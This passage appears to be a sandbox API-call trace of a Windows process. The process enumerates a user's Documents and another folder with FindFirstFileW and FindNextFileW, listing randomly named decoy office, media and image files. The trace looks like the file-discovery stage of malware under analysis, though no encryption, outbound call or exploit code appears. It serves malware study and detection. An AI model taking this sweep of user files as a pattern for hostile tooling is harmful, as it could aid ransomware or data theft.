ftLastAccessTime.dwHighDateTime=0x1d5e5de, ftLastWriteTime.dwLowDateTime=0x43e13230, ftLastWriteTime.dwHighDateTime=0x1d5e5de, nFileSizeHigh=0x0, nFileSizeLow=0x5450, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bi2gofC9nKVEjCY.png", cAlternateFileName="BI2GOF~1.PNG")) returned 1 [0227.749] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9746620, ftCreationTime.dwHighDateTime=0x1d5daa7, ftLastAccessTime.dwLowDateTime=0x50f81e40, ftLastAccessTime.dwHighDateTime=0x1d5e06e, ftLastWriteTime.dwLowDateTime=0x50f81e40, ftLastWriteTime.dwHighDateTime=0x1d5e06e, nFileSizeHigh=0x0, nFileSizeLow=0x11ec0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cYR-e.avi", cAlternateFileName="")) returned 1 [0227.749] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf00d3bf0, ftCreationTime.dwHighDateTime=0x1d5dcb8, ftLastAccessTime.dwLowDateTime=0x898f2a10, ftLastAccessTime.dwHighDateTime=0x1d5e590, ftLastWriteTime.dwLowDateTime=0x898f2a10, ftLastWriteTime.dwHighDateTime=0x1d5e590, nFileSizeHigh=0x0, nFileSizeLow=0xf6ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="d24F8YNCqwI.png", cAlternateFileName="D24F8Y~1.PNG")) returned 1 [0227.749] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6937e10, ftCreationTime.dwHighDateTime=0x1d5e38c, ftLastAccessTime.dwLowDateTime=0x53746770, ftLastAccessTime.dwHighDateTime=0x1d5de82, ftLastWriteTime.dwLowDateTime=0x53746770, ftLastWriteTime.dwHighDateTime=0x1d5de82, nFileSizeHigh=0x0, nFileSizeLow=0x11e5e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dbj5OVvUTa4bloIz9N.flv", cAlternateFileName="DBJ5OV~1.FLV")) returned 1 [0227.749] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0227.749] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc57f480, ftCreationTime.dwHighDateTime=0x1d5dff2, ftLastAccessTime.dwLowDateTime=0xdf39ff0, ftLastAccessTime.dwHighDateTime=0x1d5d8c3, ftLastWriteTime.dwLowDateTime=0xdf39ff0, ftLastWriteTime.dwHighDateTime=0x1d5d8c3, nFileSizeHigh=0x0, nFileSizeLow=0xe6c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="e6zU.xlsx", cAlternateFileName="E6ZU~1.XLS")) returned 1 [0227.749] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2be9280, ftCreationTime.dwHighDateTime=0x1d5fd34, ftLastAccessTime.dwLowDateTime=0xf3572900, ftLastAccessTime.dwHighDateTime=0x1d5fd34, ftLastWriteTime.dwLowDateTime=0x598d7d00, ftLastWriteTime.dwHighDateTime=0x1d5fd30, nFileSizeHigh=0x0, nFileSizeLow=0xba000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="h1rxxmJek7fnkHTT.exe", cAlternateFileName="H1RXXM~1.EXE")) returned 1 [0227.749] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64b4d2c0, ftCreationTime.dwHighDateTime=0x1d5e564, ftLastAccessTime.dwLowDateTime=0xef6d8c50, ftLastAccessTime.dwHighDateTime=0x1d5e315, ftLastWriteTime.dwLowDateTime=0xef6d8c50, ftLastWriteTime.dwHighDateTime=0x1d5e315, nFileSizeHigh=0x0, nFileSizeLow=0x140e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Hl4GPoq4aN.flv", cAlternateFileName="HL4GPO~1.FLV")) returned 1 [0227.749] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1df5cc0, ftCreationTime.dwHighDateTime=0x1d5de8d, ftLastAccessTime.dwLowDateTime=0xcc5668a0, ftLastAccessTime.dwHighDateTime=0x1d5e2c4, ftLastWriteTime.dwLowDateTime=0xcc5668a0, ftLastWriteTime.dwHighDateTime=0x1d5e2c4, nFileSizeHigh=0x0, nFileSizeLow=0x185e1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="irDzr_W5E9Ov4Y9L.mp3", cAlternateFileName="IRDZR_~1.MP3")) returned 1 [0227.749] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2fefa80, ftCreationTime.dwHighDateTime=0x1d5e1e3, ftLastAccessTime.dwLowDateTime=0xb53a8eb0, ftLastAccessTime.dwHighDateTime=0x1d5d95c, ftLastWriteTime.dwLowDateTime=0xb53a8eb0, ftLastWriteTime.dwHighDateTime=0x1d5d95c, nFileSizeHigh=0x0, nFileSizeLow=0x17c68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kcgsXO3.gif", cAlternateFileName="")) returned 1 [0227.749] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9be3a700, ftCreationTime.dwHighDateTime=0x1d5ddd8, ftLastAccessTime.dwLowDateTime=0x269252a0, ftLastAccessTime.dwHighDateTime=0x1d5d912, ftLastWriteTime.dwLowDateTime=0x269252a0, ftLastWriteTime.dwHighDateTime=0x1d5d912, nFileSizeHigh=0x0, nFileSizeLow=0x302b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KlHpA7bv.wav", cAlternateFileName="")) returned 1 [0227.749] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5bf1e9f0, ftCreationTime.dwHighDateTime=0x1d5d87d, ftLastAccessTime.dwLowDateTime=0xe49318f0, ftLastAccessTime.dwHighDateTime=0x1d5dce3, ftLastWriteTime.dwLowDateTime=0xe49318f0, ftLastWriteTime.dwHighDateTime=0x1d5dce3, nFileSizeHigh=0x0, nFileSizeLow=0x236f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LVyvDGQMzfnGN8ouyoSW.gif", cAlternateFileName="LVYVDG~1.GIF")) returned 1 [0227.749] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39776bf0, ftCreationTime.dwHighDateTime=0x1d5e644, ftLastAccessTime.dwLowDateTime=0xde405620, ftLastAccessTime.dwHighDateTime=0x1d5d95a, ftLastWriteTime.dwLowDateTime=0xde405620, ftLastWriteTime.dwHighDateTime=0x1d5d95a, nFileSizeHigh=0x0, nFileSizeLow=0x622b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mnMSRkjKAAPEI.mkv", cAlternateFileName="MNMSRK~1.MKV")) returned 1 [0227.749] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1dd94290, ftCreationTime.dwHighDateTime=0x1d5dcfa, ftLastAccessTime.dwLowDateTime=0x35d63a70, ftLastAccessTime.dwHighDateTime=0x1d5d7cc, ftLastWriteTime.dwLowDateTime=0x35d63a70, ftLastWriteTime.dwHighDateTime=0x1d5d7cc, nFileSizeHigh=0x0, nFileSizeLow=0xcad5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nJnoBRDZOm.mkv", cAlternateFileName="NJNOBR~1.MKV")) returned 1 [0227.749] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb25eb310, ftCreationTime.dwHighDateTime=0x1d5dd3a, ftLastAccessTime.dwLowDateTime=0x457a61c0, ftLastAccessTime.dwHighDateTime=0x1d5e73c, ftLastWriteTime.dwLowDateTime=0x457a61c0, ftLastWriteTime.dwHighDateTime=0x1d5e73c, nFileSizeHigh=0x0, nFileSizeLow=0x11e26, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="O50 BhA.wav", cAlternateFileName="O50BHA~1.WAV")) returned 1 [0227.749] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd83470b0, ftCreationTime.dwHighDateTime=0x1d5d7dc, ftLastAccessTime.dwLowDateTime=0x65a921d0, ftLastAccessTime.dwHighDateTime=0x1d5e2c7, ftLastWriteTime.dwLowDateTime=0x65a921d0, ftLastWriteTime.dwHighDateTime=0x1d5e2c7, nFileSizeHigh=0x0, nFileSizeLow=0xb8bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="p6ekR 2Fq3NJCopO9.jpg", cAlternateFileName="P6EKR2~1.JPG")) returned 1 [0227.749] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36b1d7d0, ftCreationTime.dwHighDateTime=0x1d5e7fb, ftLastAccessTime.dwLowDateTime=0xbb582430, ftLastAccessTime.dwHighDateTime=0x1d5d865, ftLastWriteTime.dwLowDateTime=0xbb582430, ftLastWriteTime.dwHighDateTime=0x1d5d865, nFileSizeHigh=0x0, nFileSizeLow=0x16114, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pqz2j.flv", cAlternateFileName="")) returned 1 [0227.749] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x906e6a0, ftCreationTime.dwHighDateTime=0x1d5d878, ftLastAccessTime.dwLowDateTime=0xfef25eb0, ftLastAccessTime.dwHighDateTime=0x1d5dc32, ftLastWriteTime.dwLowDateTime=0xfef25eb0, ftLastWriteTime.dwHighDateTime=0x1d5dc32, nFileSizeHigh=0x0, nFileSizeLow=0x7d61, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QJ1Ktf1WXPHih.rtf", cAlternateFileName="QJ1KTF~1.RTF")) returned 1 [0227.749] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecb62d0, ftCreationTime.dwHighDateTime=0x1d5e3ba, ftLastAccessTime.dwLowDateTime=0xc3d7c250, ftLastAccessTime.dwHighDateTime=0x1d5e6d4, ftLastWriteTime.dwLowDateTime=0xc3d7c250, ftLastWriteTime.dwHighDateTime=0x1d5e6d4, nFileSizeHigh=0x0, nFileSizeLow=0xe845, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Rr0jcSeUO8zIEq.wav", cAlternateFileName="RR0JCS~1.WAV")) returned 1 [0227.749] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5aa17070, ftCreationTime.dwHighDateTime=0x1d5dea4, ftLastAccessTime.dwLowDateTime=0xe3979d50, ftLastAccessTime.dwHighDateTime=0x1d5d882, ftLastWriteTime.dwLowDateTime=0xe3979d50, ftLastWriteTime.dwHighDateTime=0x1d5d882, nFileSizeHigh=0x0, nFileSizeLow=0x12a3d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rx5o5BD4nL.mp3", cAlternateFileName="RX5O5B~1.MP3")) returned 1 [0227.749] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b8ecd10, ftCreationTime.dwHighDateTime=0x1d5dc9c, ftLastAccessTime.dwLowDateTime=0xc6bc2830, ftLastAccessTime.dwHighDateTime=0x1d5debe, ftLastWriteTime.dwLowDateTime=0xc6bc2830, ftLastWriteTime.dwHighDateTime=0x1d5debe, nFileSizeHigh=0x0, nFileSizeLow=0x13179, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UKwmzFKk1.mp3", cAlternateFileName="UKWMZF~1.MP3")) returned 1 [0227.749] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff5be970, ftCreationTime.dwHighDateTime=0x1d5ddf4, ftLastAccessTime.dwLowDateTime=0xddb43af0, ftLastAccessTime.dwHighDateTime=0x1d5e60c, ftLastWriteTime.dwLowDateTime=0xddb43af0, ftLastWriteTime.dwHighDateTime=0x1d5e60c, nFileSizeHigh=0x0, nFileSizeLow=0x13a8e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="w4-qqXV2ZOEYBvDS5I.avi", cAlternateFileName="W4-QQX~1.AVI")) returned 1 [0227.749] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x489bacc0, ftCreationTime.dwHighDateTime=0x1d5e19b, ftLastAccessTime.dwLowDateTime=0x4e00a8e0, ftLastAccessTime.dwHighDateTime=0x1d5e21e, ftLastWriteTime.dwLowDateTime=0x4e00a8e0, ftLastWriteTime.dwHighDateTime=0x1d5e21e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wzVrnoY3pfgm5", cAlternateFileName="WZVRNO~1")) returned 1 [0227.749] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbc45eb0, ftCreationTime.dwHighDateTime=0x1d5e1d5, ftLastAccessTime.dwLowDateTime=0x990e5550, ftLastAccessTime.dwHighDateTime=0x1d5dc77, ftLastWriteTime.dwLowDateTime=0x990e5550, ftLastWriteTime.dwHighDateTime=0x1d5dc77, nFileSizeHigh=0x0, nFileSizeLow=0x10cb5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YArHu1.avi", cAlternateFileName="")) returned 1 [0227.749] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd618aa00, ftCreationTime.dwHighDateTime=0x1d5e52c, ftLastAccessTime.dwLowDateTime=0xb8d15b70, ftLastAccessTime.dwHighDateTime=0x1d5e1eb, ftLastWriteTime.dwLowDateTime=0xb8d15b70, ftLastWriteTime.dwHighDateTime=0x1d5e1eb, nFileSizeHigh=0x0, nFileSizeLow=0xae64, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zftDypyr-e.pps", cAlternateFileName="ZFTDYP~1.PPS")) returned 1 [0227.750] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd618aa00, ftCreationTime.dwHighDateTime=0x1d5e52c, ftLastAccessTime.dwLowDateTime=0xb8d15b70, ftLastAccessTime.dwHighDateTime=0x1d5e1eb, ftLastWriteTime.dwLowDateTime=0xb8d15b70, ftLastWriteTime.dwHighDateTime=0x1d5e1eb, nFileSizeHigh=0x0, nFileSizeLow=0xae64, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zftDypyr-e.pps", cAlternateFileName="ZFTDYP~1.PPS")) returned 0 [0227.750] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b54f0 | out: hHeap=0x630000) returned 1 [0227.750] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.750] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0227.750] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.750] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.750] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.750] PathFindFileNameW (pszPath="") returned="" [0227.750] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbd48c60, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbd48c60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7119d0 | out: hHeap=0x630000) returned 1 [0227.750] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbd48c60, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbd48c60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.751] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc79e1070, ftCreationTime.dwHighDateTime=0x1d57cd9, ftLastAccessTime.dwLowDateTime=0xca77ba80, ftLastAccessTime.dwHighDateTime=0x1d58954, ftLastWriteTime.dwLowDateTime=0xca77ba80, ftLastWriteTime.dwHighDateTime=0x1d58954, nFileSizeHigh=0x0, nFileSizeLow=0xb2fd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-t95GiOnGNPstm-E.docx", cAlternateFileName="-T95GI~1.DOC")) returned 1 [0227.751] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb968c1c0, ftCreationTime.dwHighDateTime=0x1d5ddbf, ftLastAccessTime.dwLowDateTime=0xd32ab800, ftLastAccessTime.dwHighDateTime=0x1d5ddbc, ftLastWriteTime.dwLowDateTime=0xd32ab800, ftLastWriteTime.dwHighDateTime=0x1d5ddbc, nFileSizeHigh=0x0, nFileSizeLow=0x111a5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2Tp_ LqkBdu-05P.doc", cAlternateFileName="2TP_LQ~1.DOC")) returned 1 [0227.751] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fa48540, ftCreationTime.dwHighDateTime=0x1d5ddc1, ftLastAccessTime.dwLowDateTime=0xd2899e0, ftLastAccessTime.dwHighDateTime=0x1d5d8e6, ftLastWriteTime.dwLowDateTime=0xd2899e0, ftLastWriteTime.dwHighDateTime=0x1d5d8e6, nFileSizeHigh=0x0, nFileSizeLow=0xacbc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2UWCg-ihWXmwSV 3j.docx", cAlternateFileName="2UWCG-~1.DOC")) returned 1 [0227.751] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb30cd4f0, ftCreationTime.dwHighDateTime=0x1d591ad, ftLastAccessTime.dwLowDateTime=0xf4d8bc70, ftLastAccessTime.dwHighDateTime=0x1d5cdbf, ftLastWriteTime.dwLowDateTime=0xf4d8bc70, ftLastWriteTime.dwHighDateTime=0x1d5cdbf, nFileSizeHigh=0x0, nFileSizeLow=0x188cc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7usc5a5L9F_yM.xlsx", cAlternateFileName="7USC5A~1.XLS")) returned 1 [0227.751] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9472e7c0, ftCreationTime.dwHighDateTime=0x1d5731a, ftLastAccessTime.dwLowDateTime=0x93af9fa0, ftLastAccessTime.dwHighDateTime=0x1d5bd88, ftLastWriteTime.dwLowDateTime=0x93af9fa0, ftLastWriteTime.dwHighDateTime=0x1d5bd88, nFileSizeHigh=0x0, nFileSizeLow=0x10d15, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C-gP led9.docx", cAlternateFileName="C-GPLE~1.DOC")) returned 1 [0227.751] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0227.751] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9375fb30, ftCreationTime.dwHighDateTime=0x1d5e6cb, ftLastAccessTime.dwLowDateTime=0x39dd0e20, ftLastAccessTime.dwHighDateTime=0x1d55de5, ftLastWriteTime.dwLowDateTime=0x39dd0e20, ftLastWriteTime.dwHighDateTime=0x1d55de5, nFileSizeHigh=0x0, nFileSizeLow=0x872f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eJqlwVHiXQsxuhdL3.xlsx", cAlternateFileName="EJQLWV~1.XLS")) returned 1 [0227.751] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe37c83b0, ftCreationTime.dwHighDateTime=0x1d5616f, ftLastAccessTime.dwLowDateTime=0xc59e3210, ftLastAccessTime.dwHighDateTime=0x1d57102, ftLastWriteTime.dwLowDateTime=0xc59e3210, ftLastWriteTime.dwHighDateTime=0x1d57102, nFileSizeHigh=0x0, nFileSizeLow=0x148c2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F8JB21XeX O.pptx", cAlternateFileName="F8JB21~1.PPT")) returned 1 [0227.751] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89330210, ftCreationTime.dwHighDateTime=0x1d56243, ftLastAccessTime.dwLowDateTime=0xcd4bd160, ftLastAccessTime.dwHighDateTime=0x1d55dcb, ftLastWriteTime.dwLowDateTime=0xcd4bd160, ftLastWriteTime.dwHighDateTime=0x1d55dcb, nFileSizeHigh=0x0, nFileSizeLow=0x7382, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fcB8QhTtALgAbgf6S.xlsx", cAlternateFileName="FCB8QH~1.XLS")) returned 1 [0227.751] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8df39510, ftCreationTime.dwHighDateTime=0x1d579b5, ftLastAccessTime.dwLowDateTime=0x10d9a100, ftLastAccessTime.dwHighDateTime=0x1d58e55, ftLastWriteTime.dwLowDateTime=0x10d9a100, ftLastWriteTime.dwHighDateTime=0x1d58e55, nFileSizeHigh=0x0, nFileSizeLow=0x175d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HqNUeHlIrV_.docx", cAlternateFileName="HQNUEH~1.DOC")) returned 1 [0227.751] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ade0130, ftCreationTime.dwHighDateTime=0x1d5bd82, ftLastAccessTime.dwLowDateTime=0x8d863940, ftLastAccessTime.dwHighDateTime=0x1d5bd8d, ftLastWriteTime.dwLowDateTime=0x8d863940, ftLastWriteTime.dwHighDateTime=0x1d5bd8d, nFileSizeHigh=0x0, nFileSizeLow=0x12f40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="htMWWgLGJ_E.xlsx", cAlternateFileName="HTMWWG~1.XLS")) returned 1 [0227.752] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x247a13d0, ftCreationTime.dwHighDateTime=0x1d5d229, ftLastAccessTime.dwLowDateTime=0x63909990, ftLastAccessTime.dwHighDateTime=0x1d59d90, ftLastWriteTime.dwLowDateTime=0x63909990, ftLastWriteTime.dwHighDateTime=0x1d59d90, nFileSizeHigh=0x0, nFileSizeLow=0x3591, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ijWUr.docx", cAlternateFileName="IJWUR~1.DOC")) returned 1 [0227.752] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf93870c0, ftCreationTime.dwHighDateTime=0x1d5e760, ftLastAccessTime.dwLowDateTime=0x756a84c0, ftLastAccessTime.dwHighDateTime=0x1d5df15, ftLastWriteTime.dwLowDateTime=0x756a84c0, ftLastWriteTime.dwHighDateTime=0x1d5df15, nFileSizeHigh=0x0, nFileSizeLow=0xf922, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JuCdXLzZPfwzlrM0D9FT.docx", cAlternateFileName="JUCDXL~1.DOC")) returned 1 [0227.752] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66d18ab0, ftCreationTime.dwHighDateTime=0x1d5d94f, ftLastAccessTime.dwLowDateTime=0xae174100, ftLastAccessTime.dwHighDateTime=0x1d5daab, ftLastWriteTime.dwLowDateTime=0xae174100, ftLastWriteTime.dwHighDateTime=0x1d5daab, nFileSizeHigh=0x0, nFileSizeLow=0x775d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ku2O6ZGXRTMM-OBcr5.xlsx", cAlternateFileName="KU2O6Z~1.XLS")) returned 1 [0227.752] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, 